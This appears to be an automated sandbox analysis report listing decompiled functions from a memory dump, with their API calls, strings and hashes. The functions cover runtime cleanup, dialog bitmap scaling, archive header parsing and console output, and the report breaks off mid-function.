Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 6b42227894a1f2e36ccfa5d14af5ea926c52206200db7abde3f3f06bbd33cfb2
Instruction ID: 4ec1ce669621e25897d147ae74ba37e0d441affacb4f459da5eb2b6963d1e93e
Opcode Fuzzy Hash: 6b42227894a1f2e36ccfa5d14af5ea926c52206200db7abde3f3f06bbd33cfb2
Instruction Fuzzy Hash: C1313C39526602DFEB26BE79D885B5AB3E8AF00350F20542DE069D61D1DF30E9608B24

Uniqueness

Uniqueness Score: -1.00%

Function 00288422, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00288422(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0x294be0) {
					E00287A50(_t52);
					_t26 = _a4;
				}
				E00287A50( *((intOrPtr*)(_t26 + 0x3c)));
				E00287A50( *((intOrPtr*)(_a4 + 0x30)));
				E00287A50( *((intOrPtr*)(_a4 + 0x34)));
				E00287A50( *((intOrPtr*)(_a4 + 0x38)));
				E00287A50( *((intOrPtr*)(_a4 + 0x28)));
				E00287A50( *((intOrPtr*)(_a4 + 0x2c)));
				E00287A50( *((intOrPtr*)(_a4 + 0x40)));
				E00287A50( *((intOrPtr*)(_a4 + 0x44)));
				E00287A50( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E002882E8(5,  &_v8);
				_v8 =  &_a4;
				return E00288338(4,  &_v8);
			}

0x00288428
0x0028842b
0x00288433
0x00288436
0x0028843b
0x0028843e
0x00288442
0x0028844d
0x00288458
0x00288463
0x0028846e
0x00288479
0x00288484
0x0028848f
0x0028849d
0x002884a5
0x002884ae
0x002884b6
0x002884ca

APIs

_free.LIBCMT ref: 00288436

Part of subcall function 00287A50: HeapFree.KERNEL32(00000000,00000000), ref: 00287A66
Part of subcall function 00287A50: GetLastError.KERNEL32(?,?,0028B4F8,?,00000000,?,00000000,?,0028B51F,?,00000007,?,?,0028B91C,?,?), ref: 00287A78

_free.LIBCMT ref: 00288442
_free.LIBCMT ref: 0028844D
_free.LIBCMT ref: 00288458
_free.LIBCMT ref: 00288463
_free.LIBCMT ref: 0028846E
_free.LIBCMT ref: 00288479
_free.LIBCMT ref: 00288484
_free.LIBCMT ref: 0028848F
_free.LIBCMT ref: 0028849D

Strings

K), xrefs: 0028842D

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: K)
API String ID: 776569668-3037633086
Opcode ID: 587b7770cae9f1bac74c521d0b2e20f9aaf7d65efdf431afb306a96600bd2e59
Instruction ID: 3425a9f6820c9f1f0fffe056dcd707136d003dc2e3b2cc330413e60cfa28afad
Opcode Fuzzy Hash: 587b7770cae9f1bac74c521d0b2e20f9aaf7d65efdf431afb306a96600bd2e59
Instruction Fuzzy Hash: A811777A525108EFCB05FFA4D882CDE3B65EF04350F5151A5FA294B1A2DA31DB609F80

Uniqueness

Uniqueness Score: -1.00%

Function 0027C343, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 80
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0027C343(void* __edx, void* __eflags, void* __fp0, struct HWND__* _a4) {
				intOrPtr _v20;
				intOrPtr _v24;
				void _v28;
				short _v4124;
				void* _t10;
				struct HWND__* _t11;
				void* _t21;
				void* _t28;
				void* _t29;
				void* _t31;
				struct HWND__* _t34;
				void* _t45;

				_t45 = __fp0;
				_t29 = __edx;
				E0027D940();
				_t10 = E0027952A(__eflags);
				if(_t10 == 0) {
					return _t10;
				}
				_t11 = GetWindow(_a4, 5);
				_t34 = _t11;
				_t31 = 0;
				_a4 = _t34;
				if(_t34 == 0) {
					L11:
					return _t11;
				}
				while(_t31 < 0x200) {
					GetClassNameW(_t34,  &_v4124, 0x800);
					if(E00271410( &_v4124, L"STATIC") == 0 && (GetWindowLongW(_t34, 0xfffffff0) & 0x0000001f) == 0xe) {
						_t28 = SendMessageW(_t34, 0x173, 0, 0);
						if(_t28 != 0) {
							GetObjectW(_t28, 0x18,  &_v28);
							_t21 = E0027958C(_v20);
							SendMessageW(_t34, 0x172, 0, E0027975D(_t29, _t45, _t28, E00279549(_v24), _t21));
							DeleteObject(_t28);
						}
					}
					_t11 = GetWindow(_t34, 2);
					_t34 = _t11;
					if(_t34 != _a4) {
						_t31 = _t31 + 1;
						if(_t34 != 0) {
							continue;
						}
					}
					break;
				}
				goto L11;
			}

0x0027c343
0x0027c343
0x0027c34b
0x0027c350
0x0027c357
0x0027c42e
0x0027c42e
0x0027c364
0x0027c36a
0x0027c36c
0x0027c36e
0x0027c373
0x0027c429
0x00000000
0x0027c42a
0x0027c37a
0x0027c393
0x0027c3ac
0x0027c3ce
0x0027c3d2
0x0027c3db
0x0027c3e4
0x0027c402
0x0027c409
0x0027c409
0x0027c3d2
0x0027c412
0x0027c418
0x0027c41d
0x0027c41f
0x0027c422
0x00000000
0x00000000
0x0027c422
0x00000000
0x0027c41d
0x00000000

APIs

GetWindow.USER32(?,00000005), ref: 0027C364
GetClassNameW.USER32(00000000,?,00000800), ref: 0027C393

Part of subcall function 00271410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0026ACFE,?,?,?,0026ACAD,?,-00000002,?,00000000,?), ref: 00271426

GetWindowLongW.USER32(00000000,000000F0), ref: 0027C3B1
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0027C3C8
GetObjectW.GDI32(00000000,00000018,?), ref: 0027C3DB

Part of subcall function 0027958C: GetDC.USER32(00000000), ref: 00279598
Part of subcall function 0027958C: GetDeviceCaps.GDI32(00000000,0000005A), ref: 002795A7
Part of subcall function 0027958C: ReleaseDC.USER32(00000000,00000000), ref: 002795B5

Part of subcall function 00279549: GetDC.USER32(00000000), ref: 00279555
Part of subcall function 00279549: GetDeviceCaps.GDI32(00000000,00000058), ref: 00279564
Part of subcall function 00279549: ReleaseDC.USER32(00000000,00000000), ref: 00279572

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0027C402
DeleteObject.GDI32(00000000), ref: 0027C409
GetWindow.USER32(00000000,00000002), ref: 0027C412

Strings

STATIC, xrefs: 0027C399

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CapsDeviceMessageObjectReleaseSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 1444658586-1882779555
Opcode ID: ef094c9b85e1c626f5b1e87a0e8a31999b76471e638508f0baf9ff12e466226a
Instruction ID: 33f806fd04bc16d92190d81f91f3f4bd714bbaca0210ac89f43320c5b10dead7
Opcode Fuzzy Hash: ef094c9b85e1c626f5b1e87a0e8a31999b76471e638508f0baf9ff12e466226a
Instruction Fuzzy Hash: 1021D5725603257BEB216F74DC5BFEF766CAF05710F10C026FA09B6091CB748E919AA0

Uniqueness

Uniqueness Score: -1.00%

Function 0026200C, Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0026200C(intOrPtr __ecx) {
				signed int _t135;
				void* _t137;
				signed int _t139;
				unsigned int _t140;
				signed int _t144;
				signed int _t161;
				signed int _t164;
				void* _t167;
				void* _t172;
				signed int _t175;
				signed char _t178;
				signed char _t179;
				signed char _t180;
				signed int _t182;
				signed int _t185;
				signed int _t187;
				signed int _t188;
				signed char _t220;
				signed char _t232;
				signed int _t233;
				signed int _t236;
				intOrPtr _t240;
				signed int _t244;
				signed int _t246;
				signed int _t247;
				signed int _t257;
				signed int _t258;
				signed char _t262;
				signed int _t263;
				signed int _t265;
				intOrPtr _t272;
				intOrPtr _t275;
				intOrPtr _t278;
				intOrPtr _t314;
				signed int _t315;
				intOrPtr _t318;
				signed int _t322;
				void* _t323;
				void* _t324;
				void* _t326;
				void* _t327;
				void* _t328;
				void* _t329;
				void* _t330;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;
				intOrPtr* _t336;
				signed int _t339;
				void* _t340;
				signed int _t341;
				char* _t342;
				void* _t343;
				void* _t344;
				signed int _t348;
				signed int _t351;
				signed int _t366;

				E0027D940();
				_t318 =  *((intOrPtr*)(_t344 + 0x20b8));
				 *((intOrPtr*)(_t344 + 0xc)) = __ecx;
				_t314 =  *((intOrPtr*)(_t318 + 0x18));
				_t135 = _t314 -  *((intOrPtr*)(_t344 + 0x20bc));
				if(_t135 <  *(_t318 + 0x1c)) {
					L104:
					return _t135;
				}
				_t315 = _t314 - _t135;
				 *(_t318 + 0x1c) = _t135;
				if(_t315 >= 2) {
					_t240 =  *((intOrPtr*)(_t344 + 0x20c4));
					while(1) {
						_t135 = E0026C39E(_t315);
						_t244 = _t135;
						_t348 = _t315;
						if(_t348 < 0 || _t348 <= 0 && _t244 == 0) {
							break;
						}
						_t322 =  *(_t318 + 0x1c);
						_t135 =  *((intOrPtr*)(_t318 + 0x18)) - _t322;
						if(_t135 == 0) {
							break;
						}
						_t351 = _t315;
						if(_t351 > 0 || _t351 >= 0 && _t244 > _t135) {
							break;
						} else {
							_t339 = _t322 + _t244;
							 *(_t344 + 0x28) = _t339;
							_t137 = E0026C39E(_t315);
							_t340 = _t339 -  *(_t318 + 0x1c);
							_t323 = _t137;
							_t135 = _t315;
							_t246 = 0;
							 *(_t344 + 0x24) = _t135;
							 *(_t344 + 0x20) = 0;
							if(0 < 0 || 0 <= 0 && _t340 < 0) {
								break;
							} else {
								if( *((intOrPtr*)(_t240 + 4)) == 1 && _t323 == 1 && _t135 == 0) {
									 *((char*)(_t240 + 0x1e)) = 1;
									_t232 = E0026C39E(_t315);
									 *(_t344 + 0x1c) = _t232;
									if((_t232 & 0x00000001) != 0) {
										_t236 = E0026C39E(_t315);
										if((_t236 | _t315) != 0) {
											asm("adc eax, edx");
											 *((intOrPtr*)(_t240 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca0)) + _t236;
											 *((intOrPtr*)(_t240 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca4));
										}
										_t232 =  *(_t344 + 0x1c);
									}
									if((_t232 & 0x00000002) != 0) {
										_t233 = E0026C39E(_t315);
										if((_t233 | _t315) != 0) {
											asm("adc eax, edx");
											 *((intOrPtr*)(_t240 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca0)) + _t233;
											 *((intOrPtr*)(_t240 + 0x34)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca4));
										}
									}
									_t246 =  *(_t344 + 0x20);
									_t135 =  *(_t344 + 0x24);
								}
								if( *((intOrPtr*)(_t240 + 4)) == 2 ||  *((intOrPtr*)(_t240 + 4)) == 3) {
									_t366 = _t135;
									if(_t366 > 0 || _t366 >= 0 && _t323 > 7) {
										goto L102;
									} else {
										_t324 = _t323 - 1;
										if(_t324 == 0) {
											_t139 = E0026C39E(_t315);
											__eflags = _t139;
											if(_t139 == 0) {
												_t140 = E0026C39E(_t315);
												 *(_t240 + 0x10c1) = _t140 & 0x00000001;
												 *(_t240 + 0x10ca) = _t140 >> 0x00000001 & 0x00000001;
												_t144 = E0026C251(_t318) & 0x000000ff;
												 *(_t240 + 0x10ec) = _t144;
												__eflags = _t144 - 0x18;
												if(_t144 > 0x18) {
													E00263E41(_t344 + 0x38, 0x14, L"xc%u", _t144);
													_t257 =  *(_t344 + 0x28);
													_t167 = _t344 + 0x40;
													_t344 = _t344 + 0x10;
													E00263DEC(_t257, _t240 + 0x28, _t167);
												}
												E0026C300(_t318, _t240 + 0x10a1, 0x10);
												E0026C300(_t318, _t240 + 0x10b1, 0x10);
												__eflags =  *(_t240 + 0x10c1);
												if( *(_t240 + 0x10c1) != 0) {
													_t325 = _t240 + 0x10c2;
													E0026C300(_t318, _t240 + 0x10c2, 8);
													E0026C300(_t318, _t344 + 0x30, 4);
													E0026F524(_t344 + 0x58);
													E0026F56A(_t344 + 0x60, _t240 + 0x10c2, 8);
													_push(_t344 + 0x30);
													E0026F435(_t344 + 0x5c);
													_t161 = E0027F3CA(_t344 + 0x34, _t344 + 0x34, 4);
													_t344 = _t344 + 0xc;
													asm("sbb al, al");
													__eflags =  *((intOrPtr*)(_t240 + 4)) - 3;
													 *(_t240 + 0x10c1) =  ~_t161 + 1;
													if( *((intOrPtr*)(_t240 + 4)) == 3) {
														_t164 = E0027F3CA(_t325, 0x292398, 8);
														_t344 = _t344 + 0xc;
														__eflags = _t164;
														if(_t164 == 0) {
															 *(_t240 + 0x10c1) = _t164;
														}
													}
												}
												 *((char*)(_t240 + 0x10a0)) = 1;
												 *((intOrPtr*)(_t240 + 0x109c)) = 5;
												 *((char*)(_t240 + 0x109b)) = 1;
											} else {
												E00263E41(_t344 + 0x38, 0x14, L"x%u", _t139);
												_t258 =  *(_t344 + 0x28);
												_t172 = _t344 + 0x40;
												_t344 = _t344 + 0x10;
												E00263DEC(_t258, _t240 + 0x28, _t172);
											}
											goto L102;
										}
										_t326 = _t324 - 1;
										if(_t326 == 0) {
											_t175 = E0026C39E(_t315);
											__eflags = _t175;
											if(_t175 != 0) {
												goto L102;
											}
											_push(0x20);
											 *((intOrPtr*)(_t240 + 0x1070)) = 3;
											_push(_t240 + 0x1074);
											L40:
											E0026C300(_t318);
											goto L102;
										}
										_t327 = _t326 - 1;
										if(_t327 == 0) {
											__eflags = _t246;
											if(__eflags < 0) {
												goto L102;
											}
											if(__eflags > 0) {
												L65:
												_t178 = E0026C39E(_t315);
												 *(_t344 + 0x13) = _t178;
												_t179 = _t178 & 0x00000001;
												_t262 =  *(_t344 + 0x13);
												 *(_t344 + 0x14) = _t179;
												_t315 = _t262 & 0x00000002;
												__eflags = _t315;
												 *(_t344 + 0x15) = _t315;
												if(_t315 != 0) {
													_t278 = _t318;
													__eflags = _t179;
													if(__eflags == 0) {
														E00270A64(_t240 + 0x1040, _t315, E0026C2E0(_t278, __eflags), _t315);
													} else {
														E00270A25(_t240 + 0x1040, _t315, E0026C29E(_t278), 0);
													}
													_t262 =  *(_t344 + 0x13);
													_t179 =  *(_t344 + 0x14);
												}
												_t263 = _t262 & 0x00000004;
												__eflags = _t263;
												 *(_t344 + 0x16) = _t263;
												if(_t263 != 0) {
													_t275 = _t318;
													__eflags = _t179;
													if(__eflags == 0) {
														E00270A64(_t240 + 0x1048, _t315, E0026C2E0(_t275, __eflags), _t315);
													} else {
														E00270A25(_t240 + 0x1048, _t315, E0026C29E(_t275), 0);
													}
												}
												_t180 =  *(_t344 + 0x13);
												_t265 = _t180 & 0x00000008;
												__eflags = _t265;
												 *(_t344 + 0x17) = _t265;
												if(_t265 != 0) {
													__eflags =  *(_t344 + 0x14);
													_t272 = _t318;
													if(__eflags == 0) {
														E00270A64(_t240 + 0x1050, _t315, E0026C2E0(_t272, __eflags), _t315);
													} else {
														E00270A25(_t240 + 0x1050, _t315, E0026C29E(_t272), 0);
													}
													_t180 =  *(_t344 + 0x13);
												}
												__eflags =  *(_t344 + 0x14);
												if( *(_t344 + 0x14) != 0) {
													__eflags = _t180 & 0x00000010;
													if((_t180 & 0x00000010) != 0) {
														__eflags =  *(_t344 + 0x15);
														if( *(_t344 + 0x15) == 0) {
															_t341 = 0x3fffffff;
															_t328 = 0x3b9aca00;
														} else {
															_t187 = E0026C29E(_t318);
															_t341 = 0x3fffffff;
															_t328 = 0x3b9aca00;
															_t188 = _t187 & 0x3fffffff;
															__eflags = _t188 - 0x3b9aca00;
															if(_t188 < 0x3b9aca00) {
																E002706D0(_t240 + 0x1040, _t188, 0);
															}
														}
														__eflags =  *(_t344 + 0x16);
														if( *(_t344 + 0x16) != 0) {
															_t185 = E0026C29E(_t318) & _t341;
															__eflags = _t185 - _t328;
															if(_t185 < _t328) {
																E002706D0(_t240 + 0x1048, _t185, 0);
															}
														}
														__eflags =  *(_t344 + 0x17);
														if( *(_t344 + 0x17) != 0) {
															_t182 = E0026C29E(_t318) & _t341;
															__eflags = _t182 - _t328;
															if(_t182 < _t328) {
																E002706D0(_t240 + 0x1050, _t182, 0);
															}
														}
													}
												}
												goto L102;
											}
											__eflags = _t340 - 5;
											if(_t340 < 5) {
												goto L102;
											}
											goto L65;
										}
										_t329 = _t327 - 1;
										if(_t329 == 0) {
											__eflags = _t246;
											if(__eflags < 0) {
												goto L102;
											}
											if(__eflags > 0) {
												L60:
												E0026C39E(_t315);
												__eflags = E0026C39E(_t315);
												if(__eflags != 0) {
													 *((char*)(_t240 + 0x10f3)) = 1;
													E00263E41(_t344 + 0x38, 0x14, L";%u", _t203);
													_t344 = _t344 + 0x10;
													E0026FA89(__eflags, _t240 + 0x28, _t344 + 0x30, 0x800);
												}
												goto L102;
											}
											__eflags = _t340 - 1;
											if(_t340 < 1) {
												goto L102;
											}
											goto L60;
										}
										_t330 = _t329 - 1;
										if(_t330 == 0) {
											 *((intOrPtr*)(_t240 + 0x1100)) = E0026C39E(_t315);
											 *(_t240 + 0x2104) = E0026C39E(_t315) & 0x00000001;
											_t331 = E0026C39E(_t315);
											 *((char*)(_t344 + 0xc0)) = 0;
											__eflags = _t331 - 0x1fff;
											if(_t331 < 0x1fff) {
												E0026C300(_t318, _t344 + 0xc4, _t331);
												 *((char*)(_t344 + _t331 + 0xc0)) = 0;
											}
											E0026B9DE(_t344 + 0xc4, _t344 + 0xc4, 0x2000);
											_push(0x800);
											_push(_t240 + 0x1104);
											_push(_t344 + 0xc8);
											E00271094();
											goto L102;
										}
										_t332 = _t330 - 1;
										if(_t332 == 0) {
											_t220 = E0026C39E(_t315);
											 *(_t344 + 0x1c) = _t220;
											_t342 = _t240 + 0x2108;
											 *(_t240 + 0x2106) = _t220 >> 0x00000002 & 0x00000001;
											 *(_t240 + 0x2107) = _t220 >> 0x00000003 & 0x00000001;
											 *((char*)(_t240 + 0x2208)) = 0;
											 *_t342 = 0;
											__eflags = _t220 & 0x00000001;
											if((_t220 & 0x00000001) != 0) {
												_t334 = E0026C39E(_t315);
												__eflags = _t334 - 0xff;
												if(_t334 >= 0xff) {
													_t334 = 0xff;
												}
												E0026C300(_t318, _t342, _t334);
												_t220 =  *(_t344 + 0x1c);
												 *((char*)(_t334 + _t342)) = 0;
											}
											__eflags = _t220 & 0x00000002;
											if((_t220 & 0x00000002) != 0) {
												_t333 = E0026C39E(_t315);
												__eflags = _t333 - 0xff;
												if(_t333 >= 0xff) {
													_t333 = 0xff;
												}
												_t343 = _t240 + 0x2208;
												E0026C300(_t318, _t343, _t333);
												 *((char*)(_t333 + _t343)) = 0;
											}
											__eflags =  *(_t240 + 0x2106);
											if( *(_t240 + 0x2106) != 0) {
												 *((intOrPtr*)(_t240 + 0x2308)) = E0026C39E(_t315);
											}
											__eflags =  *(_t240 + 0x2107);
											if( *(_t240 + 0x2107) != 0) {
												 *((intOrPtr*)(_t240 + 0x230c)) = E0026C39E(_t315);
											}
											 *((char*)(_t240 + 0x2105)) = 1;
											goto L102;
										}
										if(_t332 != 1) {
											goto L102;
										}
										if( *((intOrPtr*)(_t240 + 4)) == 3 &&  *((intOrPtr*)(_t318 + 0x18)) -  *(_t344 + 0x28) == 1) {
											_t340 = _t340 + 1;
										}
										_t336 = _t240 + 0x1028;
										E00261EDE(_t336, _t340);
										_push(_t340);
										_push( *_t336);
										goto L40;
									}
								} else {
									L102:
									_t247 =  *(_t344 + 0x28);
									 *(_t318 + 0x1c) = _t247;
									_t135 =  *((intOrPtr*)(_t318 + 0x18)) - _t247;
									if(_t135 >= 2) {
										continue;
									}
									break;
								}
							}
						}
					}
				}
			}

0x00262011
0x00262017
0x0026201e
0x00262022
0x00262027
0x00262031
0x00262688
0x0026268f
0x0026268f
0x00262037
0x00262039
0x0026203f
0x00262046
0x0026204f
0x00262051
0x00262056
0x00262058
0x0026205a
0x00000000
0x00000000
0x0026206d
0x00262070
0x00262072
0x00000000
0x00000000
0x00262078
0x0026207a
0x00000000
0x0026208a
0x0026208a
0x0026208f
0x00262093
0x00262098
0x0026209b
0x0026209d
0x0026209f
0x002620a1
0x002620a5
0x002620a9
0x00000000
0x002620b9
0x002620bd
0x002620ce
0x002620d2
0x002620d7
0x002620dd
0x002620e1
0x002620ea
0x00262102
0x00262104
0x00262107
0x00262107
0x0026210a
0x0026210a
0x00262110
0x00262114
0x0026211d
0x00262135
0x00262137
0x0026213a
0x0026213a
0x0026211d
0x0026213d
0x00262141
0x00262141
0x00262149
0x00262155
0x00262157
0x00000000
0x00262168
0x00262168
0x0026216b
0x0026251a
0x0026251f
0x00262521
0x00262551
0x0026255f
0x00262567
0x00262572
0x00262575
0x0026257b
0x0026257e
0x0026258d
0x00262592
0x00262596
0x0026259a
0x002625a2
0x002625a2
0x002625b2
0x002625c2
0x002625c7
0x002625ce
0x002625d6
0x002625df
0x002625ed
0x002625f7
0x00262604
0x0026260d
0x00262613
0x00262624
0x00262629
0x0026262e
0x00262632
0x00262636
0x0026263c
0x00262646
0x0026264b
0x0026264e
0x00262650
0x00262652
0x00262652
0x00262650
0x0026263c
0x00262658
0x0026265f
0x00262669
0x00262523
0x00262530
0x00262535
0x00262539
0x0026253d
0x00262545
0x00262545
0x00000000
0x00262521
0x00262171
0x00262174
0x002624f3
0x002624f8
0x002624fa
0x00000000
0x00000000
0x00262500
0x00262508
0x00262512
0x002621c9
0x002621cb
0x00000000
0x002621cb
0x0026217a
0x0026217d
0x00262374
0x00262376
0x00000000
0x00000000
0x0026237c
0x00262387
0x00262389
0x0026238e
0x00262392
0x00262394
0x0026239a
0x0026239e
0x0026239e
0x002623a1
0x002623a5
0x002623a7
0x002623a9
0x002623ab
0x002623cf
0x002623ad
0x002623bb
0x002623bb
0x002623d4
0x002623d8
0x002623d8
0x002623dc
0x002623dc
0x002623df
0x002623e3
0x002623e5
0x002623e7
0x002623e9
0x0026240d
0x002623eb
0x002623f9
0x002623f9
0x002623e9
0x00262412
0x00262418
0x00262418
0x0026241b
0x0026241f
0x00262421
0x00262426
0x00262428
0x0026244c
0x0026242a
0x00262438
0x00262438
0x00262451
0x00262451
0x00262455
0x0026245a
0x00262460
0x00262462
0x00262468
0x0026246d
0x00262496
0x0026249b
0x0026246f
0x00262471
0x00262476
0x0026247b
0x00262480
0x00262482
0x00262484
0x0026248f
0x0026248f
0x00262484
0x002624a0
0x002624a5
0x002624ae
0x002624b0
0x002624b2
0x002624bd
0x002624bd
0x002624b2
0x002624c2
0x002624c7
0x002624d4
0x002624d6
0x002624d8
0x002624e7
0x002624e7
0x002624d8
0x002624c7
0x00262462
0x00000000
0x0026245a
0x0026237e
0x00262381
0x00000000
0x00000000
0x00000000
0x00262381
0x00262183
0x00262186
0x00262317
0x00262319
0x00000000
0x00000000
0x0026231f
0x0026232a
0x0026232c
0x00262338
0x0026233a
0x0026234a
0x00262354
0x00262359
0x0026236a
0x0026236a
0x00000000
0x0026233a
0x00262321
0x00262324
0x00000000
0x00000000
0x00000000
0x00262324
0x0026218c
0x0026218f
0x002622a2
0x002622b1
0x002622bc
0x002622be
0x002622c6
0x002622cc
0x002622d9
0x002622de
0x002622de
0x002622f4
0x002622f9
0x00262304
0x0026230c
0x0026230d
0x00000000
0x0026230d
0x00262195
0x00262198
0x002621d7
0x002621de
0x002621e5
0x002621ee
0x002621fc
0x00262202
0x00262209
0x0026220d
0x0026220f
0x00262218
0x0026221f
0x00262221
0x00262223
0x00262223
0x00262229
0x0026222e
0x00262232
0x00262232
0x00262236
0x00262238
0x00262241
0x00262248
0x0026224a
0x0026224c
0x0026224c
0x0026224f
0x00262258
0x0026225d
0x0026225d
0x00262261
0x00262268
0x00262271
0x00262271
0x00262277
0x0026227e
0x00262287
0x00262287
0x0026228d
0x00000000
0x0026228d
0x0026219d
0x00000000
0x00000000
0x002621a7
0x002621b5
0x002621b5
0x002621b8
0x002621c1
0x002621c6
0x002621c7
0x00000000
0x002621c7
0x00262670
0x00262670
0x00262670
0x00262674
0x0026267a
0x0026267f
0x00000000
0x00000000
0x00000000
0x0026267f
0x00262149
0x002620a9
0x0026207a
0x00262687

Strings

x%u, xrefs: 00262524
xc%u, xrefs: 00262581
;%u, xrefs: 00262341

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: ;%u$x%u$xc%u
API String ID: 0-2277559157
Opcode ID: 70d60fbe71fd8badc2e9075fd65e6ca51b949abc2bb7b5a7f6345afdad66a6b9
Instruction ID: 1eb3529af6d43171f4de1b2b0cd03130246486cc268d0b508c4b4810d669ef6e
Opcode Fuzzy Hash: 70d60fbe71fd8badc2e9075fd65e6ca51b949abc2bb7b5a7f6345afdad66a6b9
Instruction Fuzzy Hash: E8F16C71624741DBDB14EF24C891BFE37996F94300F0844A9FD859B283DA6498FCCBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0028E2ED, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0028E2ED(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				char _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t135;
				signed int _t136;
				void* _t137;

				_t78 =  *0x29d668; // 0xd26a0a57
				_v8 = _t78 ^ _t136;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x2c0420 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t135 = _a4;
				_v60 = _t86;
				 *_t135 = 0;
				 *((intOrPtr*)(_t135 + 4)) = 0;
				 *((intOrPtr*)(_t135 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x2c0420 + _v48 * 4));
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00289474(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x2c0420 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x2c0420 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x2c0420 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
							} else {
								_t112 = E0028804C( &_v28, _t133, 2);
								_t137 = _t137 + 0xc;
								if(_t112 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E0028804C();
						_t137 = _t137 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								_t45 =  &_v36; // 0x28ea62
								if(WriteFile(_v44,  &_v24, _t97, _t45, 0) == 0) {
									L19:
									 *_t135 = GetLastError();
								} else {
